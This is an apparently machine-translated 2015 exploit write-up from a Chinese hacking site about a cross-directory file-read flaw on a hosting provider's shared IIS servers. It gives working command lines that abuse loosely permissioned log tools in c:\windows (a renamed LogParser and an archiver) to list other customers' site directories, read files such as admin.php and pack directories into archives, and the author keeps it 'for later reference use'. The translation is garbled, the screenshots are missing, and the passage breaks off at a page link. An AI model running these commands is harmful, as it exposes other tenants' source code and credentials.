The star outside the host across the web catalog file read vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201563559
Type myhack58
Reporter 佚名
Modified 2015-06-13T00:00:00


Recently encountered more and more are the star outside the host..a variety of balls..

The clouds broke, the stars outside the cross-the directory to read the file this vulnerability to bring a lot of convenience, so in this recording it for later reference use.

Detailed description:

The problem occurs in the following files, these files are not strictly set the execution permissions, the current IIS user can smoothly use them to execute command:

c:\windows\7i24IISLOG.exe c:\windows\7i24IISLOG2.exe c:\windows\7i24IISLOG3.exe c:\windows\7i24IISLOG4.exe c:\windows\7i24tool.exe c:\windows\rsb.exe These files seems to be a star outside the processing log, set the permissions of the

Wherein the 7i24IISLOG. exe is actually LogParser And LogParser is a powerful Log analysis tool, the following use to column web directory:

c:\windows\7i24IISLOG "select top 1 0 0 path from e:\host\." -i:FS-rtp:-1

Returns are as follows:

! 1.jpg

Read one of the station directory information:

c:\windows\7i24IISLOG "select top 1 0 0 path from e:\host\0233ab\." -i:FS-rtp:-1

! 2. png

The following reads the file content:

c:\windows\7i24IISLOG "select text from e:\host\0233ab\web\admin.php" -i:textline-rtp:-1

! 3. png

7i24IISLOG3. exe can be packaged ISO file, use it the same can also be listed in the directory file information:

c:\windows\7i24IISLOG3 e:\host\0233ab\web\ c:\windows\temp\123.rar

! 4. png

[1] [2] next